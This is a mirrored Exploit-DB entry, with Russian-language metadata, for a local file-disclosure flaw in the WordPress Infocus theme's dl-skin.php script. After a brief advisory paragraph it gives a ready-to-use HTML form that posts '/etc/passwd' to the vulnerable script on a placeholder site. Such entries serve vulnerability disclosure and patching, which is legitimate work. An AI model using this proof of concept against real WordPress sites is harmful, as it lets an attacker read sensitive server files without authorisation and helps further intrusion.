- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39211
- Проверка EDB
-
- Пройдено
- Автор
- FELIPE ANDRIAN PEIXOTO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2014-06-08
WordPress Theme Infocus - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure
Код:
source: https://www.securityfocus.com/bid/67934/info
The Infocus theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
<html>
<body>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
- Источник
- www.exploit-db.com